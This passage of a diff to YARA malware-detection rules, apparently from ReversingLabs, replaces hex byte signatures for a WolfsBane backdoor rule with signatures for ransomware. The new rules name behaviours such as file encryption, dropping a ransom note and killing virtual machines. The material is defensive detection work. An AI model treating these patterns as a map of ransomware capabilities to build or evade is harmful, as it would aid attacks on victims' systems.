-            C6 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 85 D2 0F 85 ?? ?? ?? ?? 48 8D 51 ?? 48
-            39 D3 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 46 88 0C 10 48 FF C1 4C 89 C3 48 39 D1 7D ??
-            48 89 4C 24 ?? 44 0F B6 04 0E 44 88 44 24 ?? 0F 1F 44 00 ?? 48 85 C9 7E ?? 4C 8D 4B
-            ?? 4C 39 CF 73 ?? 48 89 5C 24 ?? 48 89 D9 4C 89 CE 48 89 C3 48 8D 05 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 4C 8D 4B ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F
+		$find_files = {
+            41 56 41 55 41 54 49 89 FC 55 53 0F 1F 44 00 ?? 49 8B 74 24 ?? 49 8B 3C 24 E8 ?? ??
+            ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8B 38 E8 ?? ?? ?? ?? 48 85 C0 48 89 C3
+            0F 84 ?? ?? ?? ?? 66 90 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 89 C6 0F 84 ?? ?? ?? ??
+            0F B6 40 ?? 3C ?? 0F 84 ?? ?? ?? ?? 3C ?? 75 ?? 49 83 C6 ?? 4C 89 F7 E8 ?? ?? ?? ??
+            85 C0 74 ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 4C 89 F7 49 89 C5 E8 ?? ?? ?? ?? 49 8D 7C 05
+            ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 49 89 C5 48 89 C7 E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ??
+            ?? 4C 89 F6 4C 89 EF 66 41 C7 44 05 ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ??
+            4C 89 EF 49 89 C6 E8 ?? ?? ?? ?? 49 8B 54 24 ?? 49 8B 7C 24 ?? 48 89 C6 4C 89 70 ??
+            E8 ?? ?? ?? ?? 49 8B 7C 24 ?? E8 ?? ?? ?? ?? 4D 85 ED 0F 84 ?? ?? ?? ?? 4C 89 EF E8
+            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 89 C6 0F 85 ?? ?? ?? ?? 0F 1F 40 ??
+            48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 41 80 7E ??
+            ?? 0F 84 ?? ?? ?? ?? 48 8B 7D ?? 49 83 C6 ?? E8 ?? ?? ?? ?? 4C 89 F7 49 89 C5 E8 ??
+            ?? ?? ?? 49 8D 7C 05 ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 49 89 C5 48 89 C7 E8 ?? ?? ?? ??
+            4C 89 EF E8 ?? ?? ?? ?? 4C 89 F6 4C 89 EF 66 41 C7 44 05 ?? ?? ?? E8 ?? ?? ?? ?? 4C
+            89 EF E8 ?? ?? ?? ?? 4D 85 ED 49 89 C6 74 ?? 4C 89 EF E8 ?? ?? ?? ?? 49 8B 54 24 ??
+            49 8B 3C 24 4C 89 F6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 5B 5D 41 5C 41 5D 41 5E
+            C3
         }
-		$get_mac_address_p2 = {
-            B6 44 24 ?? 48 89 CF 48 8B 4C 24 ?? C6 04 18 ?? EB ?? 49 89 D9 4D 8D 51 ?? 45 89 C3
-            41 C0 E8 ?? 45 0F B6 C0 4C 8D 25 ?? ?? ?? ?? 47 0F B6 04 04 4C 39 D7 73 ?? 44 88 44
-            24 ?? 4C 89 4C 24 ?? 48 89 C3 4C 89 C9 4C 89 D6 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            4C 8D 53 ?? 48 8B 54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F B6 44 24 ?? 4C 8B 4C 24 ??
-            44 0F B6 5C 24 ?? 4C 8D 25 ?? ?? ?? ?? 48 89 CF 48 8B 4C 24 ?? 46 88 04 08 4D 8D 42
-            ?? 41 83 E3 ?? 47 0F B6 0C 23 4C 39 C7 0F 83 ?? ?? ?? ?? 4C 89 54 24 ?? 44 88 4C 24
-            ?? 48 89 C3 4C 89 D1 4C 89 C6 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 43 ?? 48 8B
-            54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F B6 4C 24 ?? 4C 8B 54 24 ?? 48 89 CF 48 8B 4C
-            24 ?? E9 ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 35 ?? ??
-            ?? ?? 66 90 E9 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 0F 1F 44 00
+		$encrypt_files_p1 = {
+            41 57 48 89 F8 41 56 41 55 41 54 55 53 48 83 EC ?? 48 89 7C 24 ?? 66 2E 0F 1F 84 00
+            ?? ?? 00 00 48 8B 78 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 72 ?? 48 8B 7A ?? E8 ??
+            ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 48 8B 30 4C 8B 68 ?? 48 85 F6 0F
+            84 ?? ?? ?? ?? 48 89 F7 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48
+            89 44 24 ?? 48 89 C7 31 C0 E8 ?? ?? ?? ?? 85 C0 89 C3 0F 88 ?? ?? ?? ?? 49 81 FD ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 41 BF ?? ?? ?? ?? 44 0F 4C F8 BA ?? ?? ?? ?? 49 8D 85 ?? ??
+            ?? ?? BD ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 4C EA B2 ?? 44 0F 4C E2
+            48 3D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 0F 46 EA 44 0F 46 FA 44 0F 46 E0
+            BA ?? ?? ?? ?? 49 81 FD ?? ?? ?? ?? B8 ?? ?? ?? ?? 45 0F 4E E5 48 0F 4E EA 44 0F 4E
+            F8 E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 45 89 E4 48 89 C7 BE ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 4C 89
         }
-		$network_communication_tcp_p1 = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
-            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 89 DF BB ?? ?? ?? ?? 48 89 C2 48 8D 05 ?? ?? ?? ?? 48 89 D1 E8
-            ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 48 89 7C 24 ?? 48 89
-            4C 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B
-            9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ??
-            ?? ?? ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 49 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54
-            24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF
-            ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 90 48 8D 05 ?? ??
-            ?? ?? 66 90 E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 50 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48
-            8B 54 24 ?? 48 89 10 90 EB ?? 48 89 C7 48 8B 54 24 ?? E8 ?? ?? ?? ?? 31 DB 48 8D 0D
-            ?? ?? ?? ?? 48 89 C7 31 C0 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 5C
+		$encrypt_files_p2 = {
+            EA 49 89 C4 4C 89 E8 48 C1 FA ?? 45 31 ED 48 F7 FD 31 ED 48 89 44 24 ?? 0F 1F 40 ??
+            31 D2 48 89 EE 89 DF E8 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 E6 89 DF 41 83 C5 ?? E8 ??
+            ?? ?? ?? 48 8B 7C 24 ?? 48 8D 54 24 ?? 31 C9 41 89 C1 4D 89 E0 BE ?? ?? ?? ?? 41 89
+            C6 E8 ?? ?? ?? ?? 31 D2 48 89 EE 89 DF E8 ?? ?? ?? ?? 44 89 F2 4C 89 E6 89 DF E8 ??
+            ?? ?? ?? 48 03 6C 24 ?? 45 39 EF 7F ?? 31 F6 BA ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48
+            8B 74 24 ?? BA ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 8B 7C 24 ??
+            E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 74 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 4D 85 E4 74 ??
+            4C 89 E7 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 74 ?? 48 8B
+            7C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 30 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ??
+            48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 8B 54 24
+            ?? 48 8B 32 EB ?? 66 0F 1F 44 00 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F
         }
-		$network_communication_tcp_p2 = {
-            24 ?? 48 89 44 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89
-            4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 31 C0 48
-            8D 5C 24 ?? B9 ?? ?? ?? ?? 48 89 CF E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 0F 1F 40 ??
-            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 48 8B 4C 24 ?? 48 89 48 ?? 83 3D ?? ??
-            ?? ?? ?? 90 75 ?? 48 8B 54 24 ?? 48 89 50 ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 58 ?? EB
-            ?? 48 8D 78 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8D 78 ?? 48 8B 9C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 31 C9 31 FF 48 8B AC 24 ??
-            ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? E8 ??
-            ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24
+		$drop_ransom_note = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 49 89 FC 48 83 EC ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 00 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? BE ?? ?? ??
+            ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 89 C7 48 8B 15 ?? ?? ?? ?? 48 89 C3 31 C0 E8
+            ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 89 DF 48 89 C5 E8 ?? ?? ?? ?? 4C 8D 6C 05 ??
+            31 ED 4D 85 ED 74 ?? 4C 89 EF E8 ?? ?? ?? ?? 4C 89 EA 31 F6 48 89 C7 48 89 C5 E8 ??
+            ?? ?? ?? 4C 89 E6 48 89 EF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48
+            89 DE 48 89 EF C6 40 ?? ?? E8 ?? ?? ?? ?? 31 F6 48 89 EF E8 ?? ?? ?? ?? 85 C0 75 ??
+            48 85 ED 74 ?? 48 89 EF E8 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 89 DF 48 8B 6C
+            24 ?? 48 8B 5C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? E9 ?? ?? ?? ?? 66 0F
+            1F 44 00 ?? 48 89 EF BA ?? ?? ?? ?? BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 3D ??
+            ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 31 C0 31 C9 BA ?? ?? ?? ?? 41 89 C4 48 89 FE E8 ?? ??
+            ?? ?? 48 8B 40 ?? 4C 8B 68 ?? 4C 89 EF E8 ?? ?? ?? ?? 44 89 E7 48 89 C2 4C 89 EE E8
+            ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 48 8B 5C 24
+            ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? C3
         }
-		$telnet_task_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
-            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ??
-            ?? 4C 89 54 24 ?? 4C 89 5C 24 ?? 48 89 9C 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 4C
-            89 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4F ?? 48 89 F0 FF D1 48 89 C3 31
-            C0 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24
-            ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
-            48 8D 8C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
-            0F 1F 40 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 90 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ??
-            48 89 4C 24 ?? 48 B9 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 4C 24 ?? 90 48 C7 44 24 ?? ?? ??
-            ?? ?? C6 44 24 ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? C6 44 24 ?? ?? 48 8D 05 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 48 8B 8C 24 ?? ?? ?? ?? 48 89
-            48 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 50 ?? 48 8B 54 24 ??
-            48 89 50 ?? EB ?? 48 8D 78 ?? 48 8B 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 78 ?? 48
-            8B 54 24 ?? E8 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 94 24 ??
-            ?? ?? ?? 48 8D 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 89 C3 48 8D 8C 24 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? 48 89 FE 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 94 24 ?? ??
-            ?? ?? 48 85 D2 74 ?? 48 8B 8C 24 ?? ?? ?? ?? 31 DB E9 ?? ?? ?? ?? 44 0F 11 7C 24
+		$kill_virtual_machines_p1 = {
+            41 57 31 C0 B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 89 FD 53 48 81 EC ?? ?? ?? ?? 48 89
+            E7 48 89 E3 F3 48 AB C6 07 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 F6 48
+            89 C7 49 89 C4 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 C1 BE ?? ?? ?? ?? 49 89 C5 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 41 BF ?? ?? ??
+            ?? EB ?? 90 83 FD ?? 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48
+            89 DF E8 ?? ?? ?? ?? 4C 89 F6 48 89 DF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 49 8D 7D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0
+            0F 84 ?? ?? ?? ?? 4C 8D 70 ?? BE ?? ?? ?? ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 89 DF C6 00
+            ?? 49 89 C5 4C 89 F9 31 C0 83 FD ?? F3 48 AB 48 8B 05 ?? ?? ?? ?? 48 89 03 48 8B 05
+            ?? ?? ?? ?? 48 89 43 ?? 48 8B 05 ?? ?? ?? ?? 48 89 43 ?? 8B 05 ?? ?? ?? ?? 89 43
         }
-		$telnet_task_p2 = {
-            48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8B 1D ??
-            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ??
-            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 8B
-            44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 1D ?? ?? ?? ?? 0F 1F 40 ?? E8 ?? ?? ??
-            ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 74 24 ?? 48 83 C6 ?? 48 89
-            CB 48 89 F1 48 89 5C 24 ?? 48 89 4C 24 ?? 0F 10 01 0F 11 84 24 ?? ?? ?? ?? 0F 10 41
-            ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 41 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 41 ?? 0F 11 84
-            24 ?? ?? ?? ?? 48 8B 44 24 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ??
-            0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24
-            ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 0F 1F 44 00 ?? E8 ?? ?? ?? ?? 48 8D 1D
-            ?? ?? ?? ?? 48 89 C1 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 94
-            24 ?? ?? ?? ?? 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24
-            ?? 48 89 4C 24 ?? 48 89 7C 24 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 4C 89
-            54 24 ?? 4C 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ??
-            48 8B 7C 24 ?? 48 8B 74 24 ?? 4C 8B 44 24 ?? 4C 8B 4C 24 ?? 4C 8B 54 24
+		$kill_virtual_machines_p2 = {
+            0F B7 05 ?? ?? ?? ?? 66 89 43 ?? 0F B6 05 ?? ?? ?? ?? 88 43 ?? 0F 85 ?? ?? ?? ?? 48
+            89 D9 8B 11 48 83 C1 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 C1
+            EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9 ?? C7 01 ?? ??
+            ?? ?? C6 41 ?? ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 48 89 D9 8B 11 48 83 C1 ?? 8D 82 ??
+            ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48
+            8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9 ?? C7 01 ?? ?? ?? ?? C6 41 ?? ?? E9 ?? ?? ?? ??
+            0F 1F 40 ?? 48 89 D9 8B 11 48 83 C1 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ??
+            74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9
+            ?? C7 01 ?? ?? ?? ?? 66 C7 41 ?? ?? ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00
+            4D 85 E4 74 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E
+            41 5F C3
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $get_local_address_p* ) ) and ( all of ( $get_mac_address_p* ) ) and ( all of ( $network_communication_tcp_p* ) ) and ( all of ( $telnet_task_p* ) )
+		uint32( 0 ) == 0x464C457F and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note ) and ( all of ( $kill_virtual_machines_p* ) )
 }
-rule REVERSINGLABS_Linux_Backdoor_Wolfsbane : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win64_Ransomware_Hotcoffee : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects WolfsBane backdoor."
+		description = "Yara rule that detects HotCoffee ransomware."
 		author = "ReversingLabs"
-		id = "07b96e74-8ad1-5400-a23c-c14fea78ecdd"
-		date = "2025-03-17"
-		modified = "2025-03-17"
+		id = "11b26b91-96ae-58d3-8a8a-02a3e7d0b82e"
+		date = "2021-11-25"
+		modified = "2021-11-25"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.WolfsBane.yara#L1-L124"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.HotCoffee.yara#L1-L111"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c2bc992375bfa989c2a18a52e09c551cd6dfefda8fb96e7af4dabfead76e784f"
+		logic_hash = "15ae428c37fcc5a09d324fd9be5a8df3a812e6459cb1ce8eec56eabf785b4c05"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "WolfsBane"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HotCoffee"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$load_embedded_library = {
-            41 57 41 56 41 55 41 54 49 89 FC 55 53 48 89 F3 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48
-            C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 48 C7 47 ?? ?? ?? ?? ?? 48 C7 47 ?? ?? ??
-            ?? ?? C7 47 ?? ?? ?? ?? ?? 48 83 C0 ?? 48 C7 47 ?? ?? ?? ?? ?? 48 89 07 48 8D 47 ??
-            48 89 47 ?? 48 89 47 ?? 48 8D 47 ?? 48 89 47 ?? 48 89 47 ?? 48 8B 06 48 39 46 ?? 0F
-            84 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? BF ?? ?? ?? ?? 49 89 E5 49 8D 47 ?? 48 89 44 24
-            ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 58 ?? 48 8B 1D ?? ?? ?? ?? 48 C7 40 ??
-            ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 83 C2 ?? 48 89 44 24 ?? 48 C7 44
-            24 ?? ?? ?? ?? ?? 48 89 10 48 8D 43 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 89 04 24 48 8D 43 ?? 48 89 44 24 ?? 48 89 E0 48 03 03 48 8B 50 ?? 48 39
-            50 ?? 0F 84 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 4C 8D 74 24 ?? 48 8D 54 24 ?? 4C 89 F7
-            48 8B 70 ?? 31 C0 80 3E ?? 0F 94 C0 48 01 C6 E8 ?? ?? ?? ?? 48 8B 04 24 4C 89 ED 48
-            03 68 ?? 48 8B 7D ?? 48 3B 7D ?? 0F 84 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 4C 89
-            F6 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 8D
-            43 ?? 48 8B 7C 24 ?? 48 89 04 24 49 8D 47 ?? 48 85 FF 48 89 44 24 ?? 74 ?? 48 8B 07
-            FF 50 ?? 48 8B 6C 24 ?? 48 8B 5C 24 ?? 48 39 DD 74 ?? 66 0F 1F 44 00 ?? 48 89 DF E8
-            ?? ?? ?? ?? 48 83 C3 ?? 48 39 DD 75 ?? 48 8B 6C 24 ?? 48 85 ED 74 ?? 48 89 EF E8 ??
-            ?? ?? ?? 48 83 C4 ?? 4C 89 E0 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+		$find_files = {
+            48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0
+            48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ??
+            ?? 4C 2B C9 0F 1F 44 00 ?? 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89
+            01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 89 30
+            48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ?? 48 8D 44 24 ??
+            48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? BA ??
+            ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B 4C 24 ?? 48 3B
+            C8 74 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 66 39 30 74 ?? 48 83
+            C0 ?? 48 83 E9 ?? 75 ?? 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6
+            BA ?? ?? ?? ?? 48 2B D0 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48
+            03 C2 4C 8D 0D ?? ?? ?? ?? 4C 2B C9 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ??
+            66 44 89 01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1
